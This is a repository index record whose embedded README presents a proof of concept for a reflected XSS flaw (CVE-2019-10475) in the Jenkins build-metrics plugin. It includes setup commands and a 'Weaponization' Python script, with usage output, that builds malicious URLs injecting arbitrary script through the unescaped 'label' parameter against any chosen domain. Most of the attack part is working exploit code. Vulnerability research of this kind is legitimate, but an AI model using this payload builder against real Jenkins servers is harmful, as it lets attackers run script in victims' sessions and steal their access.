{"id":18410599,"url":"https://github.com/vesche/cve-2019-10475","last_synced_at":"2025-04-07T10:32:24.838Z","repository":{"id":85570713,"uuid":"220101094","full_name":"vesche/CVE-2019-10475","owner":"vesche","description":null,"archived":false,"fork":false,"pushed_at":"2022-01-26T17:08:27.000Z","size":502,"stargazers_count":13,"open_issues_count":0,"forks_count":4,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-22T16:52:50.741Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"unlicense","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vesche.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-11-06T22:19:01.000Z","updated_at":"2024-08-12T19:54:37.000Z","dependencies_parsed_at":"2023-05-17T06:45:55.309Z","dependency_job_id":null,"html_url":"https://github.com/vesche/CVE-2019-10475","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vesche%2FCVE-2019-10475","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vesche%2FCVE-2019-10475/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vesche%2FCVE-2019-10475/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vesche%2FCVE-2019-10475/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vesche","download_url":"https://codeload.github.com/vesche/CVE-2019-10475/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247637178,"owners_count":20971082,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-06T03:33:01.190Z","updated_at":"2025-04-07T10:32:24.797Z","avatar_url":"https://github.com/vesche.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2019-10475\n\nQuick POC for Jenkins [CVE-2019-10475](https://nvd.nist.gov/vuln/detail/CVE-2019-10475) / [SECURITY-1490](https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490) reported on 2019-10-23. The issue is within the [build-metrics](https://plugins.jenkins.io/build-metrics) plugin which generates some basic build metrics. It's commonly used with the Jenkins sidebar links plugin.\n\nThis is a simple \u0026 generic reflected XSS vulnerability. The issue is that the plugin does not properly escape the `label` query parameter.\n\n![0](scrots/0.png)\n\n## Setup\n\nPOC was done on Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3.\n\n```bash\n# install jenkins\nsudo apt-get install daemon psmisc net-tools openjdk-11-jre\nwget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add -\nwget https://pkg.jenkins.io/debian/binary/jenkins_2.203_all.deb\ndpkg -i jenkins_2.203_all.deb\nsudo systemctl status jenkins\n# activate using admin password\nsudo cat /var/lib/jenkins/secrets/initialAdminPassword\n# get jenkins cli\nwget http://localhost:8080/jnlpJars/jenkins-cli.jar\n# install plugins\njava -jar ./jenkins-cli.jar -s \"http://localhost:8080\" -auth admin:password -noKeyAuth install-plugin global-build-stats -restart\njava -jar ./jenkins-cli.jar -s \"http://localhost:8080\" -auth admin:password -noKeyAuth install-plugin build-metrics -restart\n```\n\n## Exploit POC\n\nThe vulnearble plugin can be found at `http://localhost:8080/plugin/build-metrics/`, the vulnerable parameter is `label`. We can inject a simple script like so:\n\n![1](scrots/1.png)\n\n## Weaponization\n\nSee `CVE-2019-10475.py`, it can be used to build malicious payloads:\n\n```python\n#!/usr/bin/env python\n\nimport sys\nimport argparse\n\nVULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}\u0026range=2\u0026rangeUnits=Weeks\u0026jobFilteringType=ALL\u0026jobFilter=\u0026nodeFilteringType=ALL\u0026nodeFilter=\u0026launcherFilteringType=ALL\u0026launcherFilter=\u0026causeFilteringType=ALL\u0026causeFilter=\u0026Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96\u0026json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D\u0026Submit=Search'''\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='CVE-2019-10475')\n parser.add_argument('-p', '--port', help='port', default=80, type=int)\n parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)\n parser.add_argument('-i', '--inject', help='inject', default='\u003cscript\u003ealert(\"CVE-2019-10475\")\u003c/script\u003e', type=str)\n return parser\n\n\ndef main():\n parser = get_parser()\n args = vars(parser.parse_args())\n port = args['port']\n domain = args['domain']\n inject = args['inject']\n if port == 80:\n base_url = f'http://{domain}'\n elif port == 443:\n base_url = f'https://{domain}'\n else:\n base_url = f'http://{domain}:{port}'\n build_url = VULN_URL.format(base_url=base_url, inject=inject)\n print(build_url)\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n```\n\nUsage:\n```\n$ python3 CVE-2019-10475.py --help\nusage: CVE-2019-10475.py [-h] [-p PORT] [-d DOMAIN] [-i INJECT]\n\nCVE-2019-10475\n\noptional arguments:\n -h, --help show this help message and exit\n -p PORT, --port PORT port\n -d DOMAIN, --domain DOMAIN\n domain\n -i INJECT, --inject INJECT\n inject\n\n$ python3 CVE-2019-10475.py -p 8080 -d 192.168.1.75\nhttp://192.168.1.75:8080/plugin/build-metrics/getBuildStats?label=\u003cscript\u003ealert(\"CVE-2019-10475\")\u003c/script\u003e\u0026range=2\u0026rangeUnits=Weeks\u0026jobFilteringType=ALL\u0026jobFilter=\u0026nodeFilteringType=ALL\u0026nodeFilter=\u0026launcherFilteringType=ALL\u0026launcherFilter=\u0026causeFilteringType=ALL\u0026causeFilter=\u0026Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96\u0026json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D\u0026Submit=Search\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvesche%2Fcve-2019-10475","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvesche%2Fcve-2019-10475","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvesche%2Fcve-2019-10475/lists"}